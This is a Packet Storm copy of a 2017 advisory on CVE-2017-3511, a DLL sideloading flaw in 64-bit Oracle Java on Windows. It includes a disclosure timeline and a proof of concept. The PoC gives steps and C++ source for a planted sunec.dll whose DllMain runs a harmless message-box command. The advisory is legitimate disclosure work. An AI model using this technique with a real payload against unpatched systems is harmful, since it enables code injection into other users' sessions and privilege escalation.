what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

Oracle Java 64bit DLL Hijacking

Oracle Java 64bit DLL Hijacking
Posted Apr 21, 2017
Authored by Florian Bogner

A code injection through DLL sideloading vulnerability exists in 64-bit Oracle Java.

tags | exploit, java
systems | windows
advisories | CVE-2017-3511
SHA-256 | 4f956101cdf5d276c874cea123fd4623f5a037012bdc72feb00042183a276e5d

Oracle Java 64bit DLL Hijacking

Change Mirror Download
Code Injection through DLL Sideloading in 64bit Oracle Java

Metadata
===================================================
Release Date: 19-March-2017
Author: Florian Bogner // https://bogner.sh
Affected product: 64bit Oracle Java on Windows (https://java.com/en/)
Fixed in: Java SE: 7u131, 8u121; Java SE Embedded: 8u121; JRockit: R28.3.13
Tested on: Windows 7 and Windows 2008R2
CVE: CVE-2017-3511
URL: https://bogner.sh/2017/04/cve-2017-3511-code-injection-through-dll-sideloading-in-64bit-oracle-java
Video: https://youtu.be/bEiC4JLrV_4
Vulnerability Status: Fixed in Oracle Critical Patch Update Advisory - April 2017

Product Description
===================================================
Java is a set of computer software and specifications developed by Sun Microsystems, which was later acquired by the Oracle Corporation, that provides a system for developing application software and deploying it in a cross-platform computing environment. Java is used in a wide variety of computing platforms from embedded devices and mobile phones to enterprise servers and supercomputers.
~https://en.wikipedia.org/wiki/Java_(software_platform)

Vulnerability Description
===================================================
Vulnerable 64bit Oracle Java versions on Windows try to load some of their (crypto) dependencies from the non-existing folder C:\Program%20Files\Java\jre[version]\lib\ext. This is most likely caused by some kind of encoding issue as %20 represents an URL-encoded space. As any local user is allowed to append new folders on the C: driveas root, the Program%20Files folder can be created. Thereby, any local user can place a malicious DLL into C:\Program%20Files\Java\jre1.8.0_101\lib\ext.

Hence, code can be injected into other useras Windows sessions. Additionally if any vulnerable Java application is running as privileged application (SYSTEM, local admin, domain admin) this issue can also be used to escalate oneas permissions vertically.

Suggested Solution
===================================================
Update to the latest version.

Disclosure Timeline
===================================================
8.8.2016: The issues have been documented and reported
10.8.2016: The issue has been confirmed by the vendor
6.12.2016: CVE-2017-3511 has been assigned
19.4.2017: Fix release in Oracleas Critical Patch Update April 2017

PoC
===================================================
1.) Build a "malicious" affected DLL like sunec.dll
2.) Create the folder structure C:\Program%20Files\Java\jre1.8.0_101\lib\ext and place it in there.
3.) Start a vulnerable application (like Burp or Angry IP Scanner)

The following source can be used to build the DLL
#include <process.h>

/*
"C:\Program Files (x86)\Microsoft Visual Studio 14.0\VC\vcvarsall.bat" amd64
cl.exe /D_USRDLL /D_WINDLL sunec.cpp /link /DLL /OUT:sunec.dll
*/

/* export all required functions - use Dependency Walker to check what is needed */
extern "C"
{
__declspec(dllexport) int Java_sun_security_ec_ECDHKeyAgreement_deriveKey();
__declspec(dllexport) int Java_sun_security_ec_ECDSASignature_signDigest();
__declspec(dllexport) int Java_sun_security_ec_ECDSASignature_verifySignedDigest();
__declspec(dllexport) int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair();
}

/*
Implement DLLMain with common datatypes so we don't have to include windows.h.
*/
int DllMain(void* hinst, unsigned long* reason, void* reserved) {
system("powershell -Command \"[System.Reflection.Assembly]::LoadWithPartialName('System.Windows.Forms');[System.Windows.Forms.MessageBox]::Show('DLL Loaded')\"");
exit(1);
return 0;
}

/* Implement stubs of our exports */
int Java_sun_security_ec_ECDHKeyAgreement_deriveKey() {
return 0;
}

int Java_sun_security_ec_ECDSASignature_signDigest() {
return 0;
}

int Java_sun_security_ec_ECDSASignature_verifySignedDigest() {
return 0;
}

int Java_sun_security_ec_ECKeyPairGenerator_generateECKeyPair() {
return 0;
}

Florian Bogner

eMail: florian@bogner.sh
Web: http://www.bogner.sh
LinkedIn: https://www.linkedin.com/profile/view?id=368904276
Xing: https://www.xing.com/profile/Florian_Bogner9



Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close